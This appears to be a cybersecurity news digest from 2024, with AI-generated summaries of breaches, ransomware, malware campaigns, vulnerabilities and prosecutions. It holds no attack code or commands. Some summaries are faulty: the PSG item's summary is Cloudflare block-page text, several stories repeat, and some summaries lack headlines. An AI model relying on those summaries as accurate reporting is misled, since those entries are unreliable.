Kaiser Permanente, a major healthcare service provider, revealed a data breach potentially affecting 13.4 million individuals in the U.S. Personal information was leaked to third-party trackers on their websites and mobile apps, including IP addresses, names, and user interactions. While sensitive data like SSNs and financial details were not compromised, Kaiser Permanente has taken steps to address the incident and will notify those affected as a precaution.

Hackers leak London Stock Exchange Group’s (LSEG) World-Check Screening Database With Over Five Million Records

Hackers leaked the World-Check database from the London Stock Exchange Group, exposing over 5 million records on entities and individuals linked to risks like financial crime and terrorism. The breach, attributed to a group called GhostR, involved data illicitly obtained from a client’s system, not directly from LSEG systems. This database is crucial for entities performing “know your customer” checks to prevent illicit financial activities.

New Brokewell Malware Takes Over Android Devices, Steals Data

Security researchers have discovered a new Android banking trojan named Brokewell that captures device events, steals data, and offers remote control capabilities. The malware is distributed through a fake Google Chrome update, mimics login screens to steal credentials, and can remotely control infected devices. Developed by an individual known as Baron Samedit, Brokewell is expected to be further developed and offered to other cybercriminals, posing a significant threat to Android users. To protect against such malware, users are advised to avoid downloading apps from outside Google Play and ensure Play Protect is active on their devices.

North Korea’s Lazarus Group Deploys New Kaolin RAT via Fake Job Lures

The Lazarus Group, linked to North Korea, used fake job offers to distribute a new remote access trojan called Kaolin RAT in attacks targeting individuals in Asia. The RAT was used to deploy the FudModule rootkit, exploiting a now-patched admin-to-kernel exploit. The sophisticated attack chain showcases Lazarus Group’s continuous innovation and resource allocation, posing a significant challenge to cybersecurity efforts.

Godfather Banking Trojan Spawns 1.2K Samples Across 57 Countries

The Godfather mobile banking Trojan has spawned over 1,000 samples across 57 countries, targeting hundreds of banking apps. Mobile malware-as-a-service operators are rapidly generating unique samples to evade security software, posing a significant challenge to mobile security. Security solutions are struggling to keep up with the increasing number of malware samples, emphasizing the need for adaptive solutions and behavioral analysis to combat evolving mobile threats.

Researchers Found 18 Vulnerabilities in Brocade SANnav

A security assessment of Brocade’s SANnav Management Portal revealed 18 vulnerabilities, including hardcoded Docker keys. The vulnerabilities allowed attackers to compromise the SANNav appliance, Fibre Channel switches, and intercept credentials in clear-text communication. Insecure configurations such as lack of encryption for management protocols, hardcoded credentials in Postgres, and insecure Docker instances with read/write access to critical files were identified, posing significant risks to the system’s security.

Autodesk hosting PDF files used in Microsoft phishing attacks

Autodesk is unknowingly hosting malicious PDF files used in sophisticated Microsoft phishing attacks, where victims are tricked into revealing their login credentials. The attackers leverage compromised email accounts to send convincing phishing emails with links to documents on Autodesk Drive, leading to fake Microsoft login forms. The scale and customization of these attacks indicate automation and targeted compromises, emphasizing the importance of vigilance against such threats and the need for hosting companies to prevent abuse of their infrastructure.

Researchers Sinkhole PlugX Malware Server With 2.5 Million Unique IPs

Researchers at Sekoia sinkholed a PlugX malware server, observing 2.5 million unique IP connections from infected hosts in over 170 countries. By acquiring control of the C2 server, they were able to analyze traffic, map infections, and prevent further malicious activities. Sekoia has formulated disinfection strategies to address the challenge of removing PlugX from infected systems and USB drives, calling for national cybersecurity teams to join the effort.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

Ransom payments reached over $1 billion in 2023, marking a significant increase in both the scale and cost of ransomware attacks. The Ransomware Task Force (RTF) emphasizes that despite efforts to combat this threat, major challenges persist and half of the proposed strategic recommendations remain under-implemented. The need for intensified collaborative efforts, including legislative actions and international cooperation, is critical to address the evolving and increasingly costly ransomware landscape.

Supplement maker hack allegedly exposes 1M customers

Piping Rock, a supplement manufacturer, experienced a data breach resulting in unauthorized access to over 2.1 million emails, potentially impacting nearly one million customers. The leaked data includes names, addresses, and purchase histories. This breach’s details were confirmed by a Cybernews investigation and were publicly posted on a data leak forum by the perpetrator.

Scammers bypassing Google ad checks to impersonate real brands

Scammers are increasingly manipulating Google’s ad system to impersonate reputable brands, redirecting users to fraudulent sites. Using advanced techniques such as cloaking, they present legitimate content to Google’s bots while showing malicious sites to real users. Security experts recommend vigilance with sponsored search results and the use of protective browser extensions to guard against such malvertising threats.

WP Automatic WordPress plugin hit by millions of SQL injection attacks

Hackers are exploiting a critical vulnerability (CVE-2024-27956) in the WP Automatic WordPress plugin to create admin accounts and plant backdoors on websites. Over 5.5 million attack attempts have been observed, with hackers renaming the vulnerable file ‘csv.php’ and installing additional plugins for file uploads. To prevent compromise, administrators are advised to update the plugin to version 3.92.1 and regularly back up their websites.

Iran Dupes US Military Contractors, Gov’t Agencies in Years-Long Cyber Campaign

An elite team of Iranian state-sponsored hackers infiltrated hundreds of thousands of employee accounts at US companies and government agencies from 2016 to 2021, aiming to steal military secrets. The hackers posed as a cybersecurity company, using social engineering tactics like spearphishing and posing as women to trick victims into clicking on malicious links. The extent of data compromise and whether classified information was accessed remains unclear, and the indicted hackers are currently at large with a reward of up to $10 million offered for information leading to their apprehension.

US Takes Down Illegal Cryptocurrency Mixing Service Samourai Wallet

The US Department of Justice collaborated with Iceland’s authorities to seize Samourai Wallet’s web servers and domain, along with removing its Android app from the Google Play Store in the US. The co-founders, Keonne Rodriguez and William Lonergan Hill, were charged with conspiracy to commit money laundering and operate an unlicensed money-transmitting business. Samourai Wallet, a cryptocurrency mixing service operational since 2015, facilitated over $2bn in unlawful transactions and laundered over $100m in criminal proceeds, serving as a haven for criminals to engage in large-scale money laundering.

North Korea APT Triumvirate Spied on South Korean Defense Industry For Years

A triumvirate of North Korean advanced persistent threat (APT) groups has been conducting extensive espionage on the South Korean defense industry over several years. These groups have effectively compromised multiple South Korean entities to gather intelligence and strategic information. The prolonged cyber-espionage campaign highlights significant vulnerabilities in national security measures and underscores the need for enhanced cybersecurity protocols in sensitive sectors.

Over 1,400 CrushFTP servers vulnerable to actively exploited bug

Over 1,400 CrushFTP servers are vulnerable to a critical server-side template injection (SSTI) bug, allowing unauthenticated attackers to achieve remote code execution. Rapid7 confirmed the severity of the flaw, emphasizing the risk of arbitrary file read and authentication bypass. CrowdStrike reported targeted attacks exploiting the zero-day, urging users to promptly apply patches to safeguard against ongoing exploitation attempts.

LA County Health Services: Patients’ data exposed in phishing attack

The Los Angeles County Department of Health Services experienced a data breach due to a phishing attack, where 23 employees had their credentials stolen. Patients’ personal and health information, including medical records and contact details, were exposed. While no evidence of misuse was found, affected individuals are advised to verify the accuracy of their medical records and the health system has taken steps to enhance cybersecurity measures.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

The U.S. Treasury Department sanctioned two Iranian firms and four individuals for engaging in cyber activities on behalf of the Iranian Revolutionary Guard Corps Cyber Electronic Command. The individuals targeted U.S. companies and government entities through cyber operations, leading to indictments and a reward for information. The defendants face charges including conspiracy to commit computer fraud and wire fraud, with potential prison sentences of up to 20 years.

Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt Strike

Security researchers have uncovered an ongoing attack campaign, codenamed FROZEN#SHADOW, utilizing phishing emails to distribute SSLoad malware, Cobalt Strike, and ConnectWise ScreenConnect. SSLoad is designed to infiltrate systems, deploy backdoors, and maintain persistence while avoiding detection. The attackers pivot to other systems in the network, including the domain controller, creating their own domain administrator account to achieve high levels of persistence and access within the victim’s Windows domain.

Major Security Flaws Expose Keystrokes of Over 1 Billion Chinese Keyboard App Users

Security vulnerabilities in cloud-based pinyin keyboard apps used by over 1 billion Chinese users were discovered by Citizen Lab, exposing their keystrokes to potential exploitation. Eight out of nine apps from vendors like Baidu, Honor, iFlytek, OPPO, Samsung, Tencent, Vivo, and Xiaomi were found to have weaknesses, with Huawei being the only exception. The vulnerabilities could allow adversaries to decrypt keystrokes passively, prompting recommendations for users to update their apps, switch to on-device keyboard apps, and for developers to use standard encryption protocols.

eScan Antivirus Update Mechanism Exploited to Spread Backdoors and Miners

A new malware campaign is exploiting the eScan antivirus software’s update mechanism to distribute backdoors and cryptocurrency miners, targeting large corporate networks. The threat, known as GuptiMiner, is believed to be connected to a North Korean hacking group called Kimsuky. The malware campaign involves a sophisticated infection chain that leverages a security flaw in eScan’s update mechanism, allowing the attackers to deploy malicious payloads undetected for at least five years.

US Charges Samourai Cryptomixer Founders for Laundering $100 Million

The U.S. Department of Justice has charged Keonne Rodriguez and William Lonergan Hill for laundering over $100 million through their cryptocurrency mixer service, Samourai. Criminals utilized Samourai’s services to process more than $2 billion in illicit funds, with the founders allegedly earning $4.5 million in fees. The founders are facing charges of money laundering and operating an unlicensed money-transmitting business, with Rodriguez in custody and Hill arrested in Portugal awaiting extradition to the U.S.

Medical Diagnostics Provider Synlab Halts Services Over Ransomware Attack

Synlab Italia, part of a major medical diagnostics firm, had to shut down its IT systems nationwide following a cyberattack, suspected to be ransomware, which potentially compromised sensitive customer data. Nearly 400 labs across Italy halted all operations, including patient services and data access. The disruption persisted for several days as the company worked to isolate and address the security breach.

CISA Warns of Windows Print Spooler Flaw After Microsoft Sees Russian Exploitation

CISA has updated its Known Exploited Vulnerabilities catalog to include a critical Windows Print Spooler flaw, CVE-2022-38028, after Microsoft reported its exploitation by Russian cyberespionage group APT28. This vulnerability, discovered in 2022, allows for privilege escalation and has been actively used to deploy malware and harvest credentials across multiple sectors. Organizations are urged to patch this vulnerability promptly to mitigate potential cyber threats.

US Congress Passes Bill to Ban TikTok

The US Senate voted on a bill that could ban TikTok or force ByteDance to relinquish ownership of the app, with 79 senators in favor and 18 against. The bill, titled Protecting Americans from Foreign Adversary Controlled Applicants Act, now awaits President Biden’s signature. ByteDance has a year to disassociate from TikTok in the US or face legal prohibitions, while TikTok’s ties with Chinese intelligence are under scrutiny.

ArcaneDoor Hackers Exploit Cisco Zero-days to Breach Government Networks

Cisco has warned of a state-backed hacking group, identified as UAT4356 and STORM-1849, exploiting two zero-day vulnerabilities in Cisco firewalls since November 2023 to breach government networks worldwide. The vulnerabilities allowed the threat actors to deploy malware implants like ‘Line Dancer’ and ‘Line Runner’ for malicious actions, including configuration modification and network traffic capture. Cisco has released security updates to fix the zero-days and urges customers to upgrade their devices and monitor for any signs of unauthorized activity.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

A threat actor claimed responsibility for a March 2024 data breach at Giant Tiger, exposing 2.8 million customer records including email addresses, names, addresses, and phone numbers. The hacker dropped the data set for free on a forum, requiring ‘8 credits’ to unlock the download link. Giant Tiger attributed the breach to a cybersecurity incident with a third-party vendor, urging customers to be cautious of messages regarding payment information.

Attackers Have Penetrated Volkswagen Group’s Systems, Stealing Over 19,000 Documents with Intellectual Property

Volkswagen Group experienced a significant breach where attackers, suspected to be from China, infiltrated their systems for over five years, exfiltrating around 19,000 documents related to engine and transmission development, including electric vehicle innovations. The German automaker’s security team has recovered some of the stolen files, indicating the potential for a larger undisclosed impact. This extended breach, highlighted by evidence from IP addresses and time zone analyses, underscores a major espionage effort targeting critical technological advancements in the automotive industry.

Synlab Italia suspends operations following ransomware attack

Synlab Italia, part of a global network, suspended all medical diagnostic services in Italy following a ransomware attack that compromised their IT systems. The attack, detected on April 18, led to the shutdown of all computers to contain the breach. While efforts are underway to restore services and eliminate malware, customers are advised to stay updated through the company’s website and social media channels.

Rural Texas Towns Report Cyberattacks That Caused One Water System to Overflow

Recent cyberattacks in rural Texas have impacted local water systems, including an overflow incident caused by Russian hacktivist group infiltrations. These attacks targeted multiple towns, with one resulting in 37,000 failed login attempts over four days. Despite rapid responses from local authorities to mitigate damage, these incidents underscore the increasing vulnerability of public utilities to cyber threats and emphasize the need for enhanced security measures.

Researchers Uncover Windows Flaws Granting Attackers Rootkit-Like Powers

Researchers have discovered Windows flaws in the DOS-to-NT path conversion process that can be exploited by threat actors to gain rootkit-like capabilities, allowing them to hide files, processes, and carry out malicious actions without admin permissions. These vulnerabilities have led to the discovery of security shortcomings, including an elevation of privilege deletion vulnerability, an elevation of privilege write vulnerability, a remote code execution vulnerability, and a denial-of-service vulnerability impacting Process Explorer. The implications of these vulnerabilities extend beyond Microsoft Windows, highlighting the importance for all software vendors to address known issues to prevent significant security risks.

Ukrainian Soldiers’ Apps Increasingly Targeted for Spying

Ukrainian soldiers’ messaging apps are increasingly targeted by hackers for spying, as reported by CERT-UA. The surge in attacks is attributed to a group known as UAC-0184, deploying various malware like HijackLoader and Remcos. Russian hackers have also been previously identified targeting Ukraine’s military messaging apps, aiming to exfiltrate encrypted communications and sensitive data.

51% of Enterprises Experienced a Breach Despite Large Security Stacks

Despite investing in large security stacks, 51% of enterprises experienced a breach in the past 24 months, leading to unplanned downtime, data exposure, and financial loss. Enterprises prioritize pentesting but struggle with a frequency gap between IT environment changes and security validation testing. Organizations are adopting more cybersecurity tools to manage risk, with an average of 53 security solutions in use, but face resource constraints and network downtime concerns related to pentesting.

MITRE Breached by Nation-state Threat Actor via Ivanti Zero-days

MITRE Corporation was breached by a nation-state threat actor through two zero-day vulnerabilities in Ivanti’s Connect Secure VPN devices, leading to lateral movement and compromise of the company’s VMware infrastructure. The attackers exploited the vulnerabilities to hijack VPN sessions, maintain persistence with webshells and backdoors, exfiltrate data, and create staging virtual machines. MITRE responded by taking down the affected environment, initiating an investigation, and sharing advice for defenders to monitor VPN traffic, segment networks, and use threat intelligence feeds.

An Unrestricted File Upload Vulnerability in the Forminator Plugin Impacts Hundreds of Thousands of WordPress Sites

Japan’s CERT has warned of multiple vulnerabilities in the Forminator WordPress plugin, including a critical flaw allowing unrestricted file uploads, potentially leading to remote code execution and sensitive data exposure. The plugin, with over 500,000 installations, is susceptible to attacks exploiting CVE-2024-28890, CVE-2024-31077, and CVE-2024-31857. Admins are urged to update to version 1.29.3 to mitigate these risks, as over 200,000 sites remain vulnerable to cyber attacks.

Cannes Hospital Cancels Medical Procedures Following Cyberattack

Cannes Hospital was forced to cancel non-urgent medical procedures and revert to manual operations after a cyberattack led to a shutdown of its IT systems. The hospital has prioritized emergency and essential services while cooperating with regional healthcare entities to manage patient needs effectively. No data theft or ransom demands have been reported, though the recovery of IT services is anticipated to be a prolonged process.

Researchers Observe a Flood of Crude and Amateurish Ransomware

Sophos X-Ops researchers report an upsurge in the sale of inexpensive, rudimentary ransomware on the dark web, referred to as “junk guns.” These low-cost ransomware tools are accessible for as little as $20, attracting lower-skilled criminals targeting small businesses and individuals. Despite their affordability and simplicity, these ransomware variants represent a growing risk to smaller targets, emphasizing the need for heightened awareness and defense measures in cybersecurity practices.

Ransomware Double-Dip: Re-Victimization in Cyber Extortion

A new trend in ransomware attacks involves “double-dipping” where threat actors repeatedly target previously victimized entities, often through re-use of stolen data or access. This cyclic victimization not only compounds the distress for affected organizations but also signifies a shift towards more aggressive extortion tactics in the cybercrime ecosystem. The increasing frequency of such re-attacks highlights a critical vulnerability in cybersecurity defenses and emphasizes the necessity for improved protective measures and response strategies.

Almost 200,000 data tracking attempts were made in just 30 days on a regular Android device through installed apps.

A recent study using /e/OS on an Android device revealed nearly 195,000 data tracking attempts within a month from 34 third-party apps, indicating a significant privacy risk. Data collected ranged from user demographics to sensitive information, with some data being sent to servers in Russia and China. The pervasive nature of this tracking emphasizes the challenges in avoiding surveillance, even with stringent privacy settings.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

The Akira ransomware group has extorted $42 million from over 250 victims by targeting businesses and critical infrastructure in North America, Europe, and Australia. They have evolved to target Linux servers, using various tactics like exploiting known vulnerabilities in Cisco appliances and utilizing tools like Mimikatz for privilege escalation. Additionally, the Akira ransomware group is believed to be linked to the Conti ransomware gang and has been observed using a hybrid encryption algorithm to encrypt systems.

180k Impacted by Data Breach at Michigan Healthcare Organization

Cherry Health in Michigan reported a ransomware attack that compromised the personal data of approximately 184,000 individuals on December 21, 2023. The breach involved sensitive information including Social Security numbers, health insurance details, and financial account information. The organization has notified affected individuals and is offering free credit monitoring and identity protection services.

22,500 Palo Alto Firewalls “Possibly Vulnerable” to Ongoing Attacks

Approximately 22,500 Palo Alto GlobalProtect firewall devices are vulnerable to the CVE-2024-3400 flaw, allowing unauthenticated attackers to execute commands with root privileges. Palo Alto Networks released patches between April 14 and 18, 2024, after the flaw was actively exploited by state-backed threat actors. Despite mitigation efforts, there are still around 22,500 possibly vulnerable instances, mainly in the United States, Japan, and India.

United Nations Agency Investigates Ransomware Attack, Data Theft

The United Nations Development Programme (UNDP) is investigating a cyberattack where threat actors breached its IT systems to steal human resources data. The attack, possibly linked to the 8Base ransomware gang, resulted in the exposure of sensitive information such as personal data, accounting data, and employment contracts. This incident highlights the ongoing threat of ransomware attacks targeting organizations, including those as prominent as the United Nations.

France’s Cannes Hospital in Midst of Major Cyberattack

Hôpital de Cannes – Simone Veil in France was hit by a severe cyberattack, resulting in all IT systems being shut down and the hospital reverting to manual, paper-based methods for documenting patient services. The hospital has canceled about a third of non-urgent procedures and is coordinating with local medical facilities to maintain emergency services. Ongoing investigations are supported by multiple cybersecurity agencies, and while there have been no ransom demands or confirmed data breaches, the hospital remains vigilant in maintaining patient care and updates.

OpenMetadata Vulnerabilities Exploited to Abuse Kubernetes Clusters for Cryptomining

Multiple vulnerabilities in OpenMetadata have been exploited to compromise Kubernetes clusters for cryptomining purposes. Threat actors have utilized critical authentication bypass and remote code execution flaws to infiltrate systems, downloading cryptomining malware from servers based in China. Microsoft advises updating OpenMetadata to the latest version to mitigate these risks and protect Kubernetes environments.

Cyberattack Takes Texas-based Frontier Communications Offline

Frontier Communications, a Texas-based telecom provider operating in 25 states, shut down its operations following a cyberattack that led to the theft of personally identifiable information. The breach, detected on April 14, resulted in certain systems being taken offline, causing operational disruptions. The company is currently investigating the incident, engaging cybersecurity experts, and cooperating with law enforcement authorities.

Russian APT Group Thwarted in Attack on US Automotive Manufacturer

Researchers disclosed an attack campaign by the FIN7 threat group targeting a US-based global automotive manufacturer, using spear-phishing to target IT employees with high admin-level rights. BlackBerry’s threat and research team detected and stopped the attack before the ransomware phase. FIN7, also known as Carbon Spider, is expanding its targets to include defense, insurance, and transportation sectors, aiming for larger entities with the expectation of higher ransom payments.

Multiple LastPass Users Lose Master Passwords to Ultra-Convincing Scam

A sophisticated phishing campaign named CryptoChameleon has targeted LastPass users, tricking them into revealing their master passwords through a series of well-crafted social engineering tactics. The attackers use a combination of phone calls, spoofed numbers, and personalized interactions to deceive victims into divulging sensitive information. Despite the attackers’ persistence and evolving tactics, awareness, caution with unsolicited communications, and refraining from sharing passwords are crucial defenses against such elaborate phishing schemes.

MITRE Says State Hackers Breached its Network via Ivanti Zero-days

MITRE Corporation disclosed a state-backed hacking group breached their systems in January 2024 by exploiting two Ivanti VPN zero-days, compromising their NERVE network. The attackers bypassed MFA defenses, used webshells and backdoors, and deployed malware for espionage. The incident led to mass exploitation affecting various organizations, prompting CISA to issue an emergency directive for federal agencies to mitigate the Ivanti zero-days.

UNDP, City of Copenhagen Targeted in Data-Extortion Cyberattack

The United Nations Development Programme (UNDP) and the city of Copenhagen, Denmark, were targeted in a cyberattack in late March, leading to data theft related to human resources and procurement. The UNDP is currently assessing the extent of the breach and has taken steps to identify the source and contain the affected server. While the ransomware gang 8Base claimed responsibility for the attack, the UNDP has not confirmed any ransom demands or payments.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

Asantee Games experienced a significant data leak impacting over 14 million players of their game, Magic Rampage, due to a misconfigured MongoDB database that lacked password protection. The exposed data included player usernames, emails, device data, and admin credentials with encrypted passwords. This breach poses serious risks for identity theft, phishing attacks, and unauthorized access to internal systems, highlighting the need for stringent database security practices.

Cherry Health Hit by Ransomware Attack Affecting 185,000 Individuals

Cherry Health, a U.S.-based healthcare provider, experienced a ransomware attack affecting 185,000 individuals, with a variety of personal and medical information compromised. This included names, addresses, health records, and Social Security numbers. The organization has since engaged third-party specialists for a comprehensive investigation and is advising affected patients to monitor their credit reports and account statements for any suspicious activity.

SAP Users Are at High Risk as Cybercriminals Exploit Application Vulnerabilities

Recent research highlights a significant increase in threat actor interest in exploiting SAP vulnerabilities, leading to a surge in ransomware incidents targeting poorly patched organizations. The research reveals a 400% growth in attacks since 2021, with ransomware groups like Conti, Quantum, and REvil being involved. Dark web chatter on SAP vulnerabilities has surged by 490%, emphasizing the need for organizations to secure their SAP systems, patch vulnerabilities, and enhance cybersecurity measures.

If you use Fortinet FortiClient EMS, patch NOW

Cybersecurity researchers have identified a campaign exploiting a critical SQL injection flaw in Fortinet FortiClient EMS devices to deploy ScreenConnect and Metasploit Powerfun payloads. The campaign, codenamed Connect:fun, targeted a media company by leveraging the vulnerability to download and install malicious tools. The threat actor behind the campaign has shown manual intervention and specific targeting, emphasizing the importance of applying patches, monitoring for suspicious activity, and utilizing web application firewalls to mitigate potential risks.

Exploitation of Palo Alto Firewall Vulnerability Picking Up After PoC Release

The exploitation of a Palo Alto Networks firewall vulnerability (CVE-2024-3400) has increased following the release of Proof-of-Concept (PoC) code. This critical flaw allows remote code execution with root privileges via the GlobalProtect feature and device telemetry. Cybersecurity firms have observed sophisticated threat actors, including a potential state-sponsored group, using this vulnerability to infiltrate networks and deploy malicious payloads.

Cisco: Multiple VPN, SSH Services Targeted in Mass Brute-Force Attacks

Cisco has reported a significant uptick in brute-force attacks targeting VPN and SSH services, leveraging anonymizing proxies and Tor exit nodes. The attackers are using a mix of generic and known organization-specific usernames to access web applications, potentially leading to unauthorized network access or service disruptions. Cisco has updated its block list to include IPs associated with these attacks but anticipates ongoing and possibly escalating threats.

Ivanti Releases Fixes for More Than 2 Dozen Vulnerabilities

Ivanti has addressed 27 vulnerabilities in its 2024 first-quarter release, with fixes ranging from a vulnerability allowing an authenticated remote attacker to view sensitive information to a heap overflow vulnerability enabling remote command execution. The company recommends users to update to Avalanche 6.4.3 to apply all the fixes and emphasizes the importance of having the MSSQL database password readily available. Users can download the update and find further instructions on Ivanti’s website.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

Two individuals have been arrested in Australia and the U.S. for their involvement in developing and distributing the remote access trojan Hive RAT, allowing control over victim computers and access to private information. Additionally, a Nebraska man was indicted for operating a $3.5 million illegal cryptojacking operation, defrauding cloud computing providers to mine cryptocurrency. The suspects face charges including wire fraud, money laundering, and engaging in unlawful monetary transactions, with potential sentences of up to 20 years in prison.

Iran-Backed Hackers Blast Out Threatening Texts to Israelis

The Handala cyber group, allegedly backed by Iran, claimed to have compromised Israel’s radar systems and sent over 500,000 threatening texts to Israeli citizens amidst ongoing military tensions. The messages warned of imminent danger and urged citizens to evacuate, amplifying fear and confusion. While these claims have yet to be verified by Israeli officials, they reflect the escalating use of cyber warfare in geopolitical conflicts.

Ransomware Group Starts Leaking Data Allegedly Stolen From Change Healthcare

The RansomHub group has begun to leak data they claim to have stolen from Change Healthcare, involving highly sensitive personal and medical information. This follows an earlier ransomware attack by the Alphv/BlackCat group, from which RansomHub acquired the data. In response to these events, Change Healthcare’s parent company, UnitedHealth Group, is working on mitigating the impact on affected customers and has provided significant financial support to healthcare providers.

Change Healthcare cyberattack caused $872 million loss

UnitedHealth Group experienced an $872 million impact on its Q1 earnings as a result of a ransomware attack on Change Healthcare, with $593 million in direct cyberattack response costs and $279 million due to business disruptions. The attack led to a $0.74 per share impact in Q1, with estimated full-year 2024 impacts of $1.15 to $1.35 per share. The cyberattack disrupted the U.S. healthcare system, affecting claims receipt timing and prompting UnitedHealth to reflect an additional $800 million in claims reserves.

Omni Hotels Says Personal Information Stolen in Ransomware Attack

Omni Hotels confirmed a ransomware attack by the Daixin Team, which led to the theft of customer data dating back to 2017, affecting an estimated 3.5 million guests. Although sensitive financial details were not exposed, compromised data included names, emails, mailing addresses, and loyalty program information. The company has restored its systems and is navigating ransom negotiations, initially set at $3.5 million but reduced to $2 million.

Cisco Duo’s Multifactor Authentication Service Breached

A third-party provider handling telephony for Cisco’s Duo multifactor authentication service was compromised by a social engineering cyberattack, leading to a breach where SMS logs were downloaded for specific users. Cisco Duo customers were advised to watch out for potential phishing schemes. This incident highlights the risks associated with third-party identity security providers and emphasizes the importance of assessing the impact of such breaches on cybersecurity posture.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

A threat actor claimed responsibility for a March 2024 data breach at Giant Tiger, exposing 2.8 million customer records including email addresses, names, addresses, and phone numbers. The hacker dumped the stolen data on a forum, offering it for free with a download link requiring ‘8 credits’ to unlock. Giant Tiger confirmed the breach was due to a cybersecurity incident with a third-party vendor, urging customers to be cautious of messages regarding payment information.

Roku cyberattack impacts 576,000 accounts

Roku reported that 576,000 user accounts were affected by a cyberattack, discovered during an investigation of an earlier breach involving 15,000 accounts. Both incidents involved credential stuffing, where stolen login data from other breaches were used to access Roku accounts, leading to unauthorized purchases in fewer cases. Roku has since implemented two-factor authentication and reset passwords for affected accounts, and is actively notifying and compensating impacted users.

Former Security Engineer Sentenced to Prison for Hacking Crypto Exchanges

Shakeeb Ahmed, a former security engineer, has been sentenced to three years in prison for exploiting vulnerabilities in smart contracts of two cryptocurrency exchanges, defrauding them of substantial sums. By manipulating price data and smart contract terms, Ahmed illegally withdrew millions, returning some funds in exchange for a “bounty” while keeping the rest. His sentence also includes three years of supervised release and restitution payments totaling over $5 million to the affected exchanges.

Airlines Apps Might Know More Than You Think

Recent investigations into popular airline apps reveal they may access more personal data than expected, raising privacy and cybersecurity concerns. Cybernews highlighted that these apps often require permissions that could compromise user data security, not always clearly disclosed. Furthermore, incidents like AirAsia’s alleged ransomware attacks underline the vulnerability of airline systems and the urgent need for stringent data protection measures.

Chipmaker Nexperia Confirms Breach After Ransomware Gang Leaks Data

Dutch chipmaker Nexperia confirmed a data breach after a ransomware gang leaked samples of allegedly stolen data. The breach occurred in March 2024, with the threat actors claiming to have stolen 1 TB of confidential data. The extortion site ‘Dunghill Leak’ linked to the Dark Angels ransomware gang is pressuring Nexperia to pay a ransom to prevent the leak of sensitive information, including data from high-profile clients like SpaceX, IBM, Apple, and Huawei.

Daixin Ransomware Gang Claims Attack on Omni Hotels

The Daixin Team ransomware gang has claimed responsibility for a cyberattack on Omni Hotels & Resorts, threatening to publish customers’ sensitive information if a ransom is not paid. The attack led to a nationwide IT outage impacting reservation, hotel room door lock, and point-of-sale systems. Daixin Team is known for targeting organizations through VPN server vulnerabilities or compromised credentials, using stolen data for double extortion.

Pro-Iranian Cyber Gang Claims to Have Breached Radar Systems and Sent 500,000 Text messages to Israeli Citizens

Pro-Iranian cyber groups have escalated their cyberattacks in tandem with Iran’s missile strikes against Israel, claiming to have compromised Israeli radar systems and sent threatening text messages to citizens. Despite posting proof, inconsistencies in the hackers’ claims cast doubt on the actual impact of these cyberattacks. The intensifying cyber operations target both governmental and private sectors, indicating a broader strategy to supplement physical military actions.

Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users

Cybersecurity researchers have identified a renewed cyber espionage campaign targeting South Asian users with LightSpy, an Apple iOS spyware implant. The spyware, known as ‘F_Warehouse,’ is sophisticated, modular, and capable of extensive data exfiltration, audio surveillance, and potential full device control. The malware, attributed to Chinese nation-state group APT41, employs certificate pinning to evade detection and communicates with a server displaying Chinese error messages, indicating possible state-sponsored activity.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

AT&T is notifying 51 million former and current customers about a data breach that exposed their personal information on a hacking forum, with details including names, addresses, phone numbers, social security numbers, and more. The breach, initially denied by AT&T, was confirmed after data was leaked by threat actors. AT&T is now facing class-action lawsuits for the security lapse and delay in informing affected customers, urging recipients to monitor their accounts and enroll in identity theft protection services.

Attack on Consumer Electronics Manufacturer boAt Leaks Data on 7.5M Customers

A hacker leaked the personal data of 7.5 million boAt customers, including comprehensive personal information, by posting it on the Dark Web for a mere $2, raising questions about the data’s authenticity. Investigations confirmed the accuracy of the leaked data, spotlighting the vulnerability of boAt, India’s leading consumer electronics brand. Experts emphasize the importance of data encryption and anti-exfiltration tools to prevent such breaches, suggesting boAt’s security measures were insufficient.

Underground Online Casino Fixbet Exposes 850K Users

The underground online casino Fixbet, targeting the Turkish market, suffered a data breach exposing personal information of 850,000 users. This breach is particularly sensitive due to the illegal status of gambling in Turkey, placing users at risk of cyberstalking, financial loss, and legal repercussions. The leak was attributed to human error, revealing usernames, passwords, and extensive personal details, underscoring the critical need for stringent data security measures in online gambling platforms.

Accor Hospitality Database Leaked, Exposing 642K Individuals

A database linked to hospitality giant Accor was leaked, compromising the personal information of 642,000 individuals. The leak includes names, emails, job titles, and employer details, raising risks of targeted phishing and scams. The breach underscores the need for stringent data security and vigilance against social engineering attacks.

LG TV Vulnerabilities Expose 91,000 Devices

Bitdefender discovered vulnerabilities in LG TVs’ WebOS versions 4 through 7, allowing unauthorized access to the root system, affecting models like LG43UM7000PLA and OLED55CXPUA. CVE-2023-6317, CVE-2023-6318, CVE-2023-6319, and CVE-2023-6320 were identified, enabling attackers to bypass authorization, escalate privileges, inject commands, and execute authenticated command injections. Bitdefender’s disclosure timeline revealed vendor notification on November 1, 2023, with a patch released on March 22, 2024, emphasizing the importance of prompt patching and updates to mitigate risks and enhance device security.

French Football Giant PSG Says Attackers Targeted its Ticketing System

Cybernews.com is using a security service to protect against online attacks, and your access has been blocked due to triggering the security solution. To resolve this, email the site owner with details of your actions when the block occurred and the Cloudflare Ray ID provided on the page.

Ransomware Attack Cripples German Business Intelligence Provider GBI Genios

A ransomware attack on GBI Genios, a key German business intelligence and database provider, has severely disrupted access to crucial press publications and business information, with expectations of several days for service restoration. This incident affects a wide range of institutions, including media, universities, and libraries, highlighting the vulnerability of critical information infrastructure to cyber threats. The attack underlines the importance of robust cybersecurity measures for data providers.

Half of UK Businesses Hit by Cyber-Incident in Past Year, UK Government Finds

The UK Government’s Cyber Security Breaches Survey 2024 reveals that half of UK businesses and a third of charities experienced cyber incidents in the past year, with phishing being the primary cause. While most organizations were able to restore operations within 24 hours, large businesses faced more negative outcomes. The survey also highlights a lack of focus on risk management, incident response plans, and supply chain security, emphasizing the need for improved cybersecurity measures and awareness.

GitHub’s Fake Popularity Scam Tricking Developers into Downloading Malware

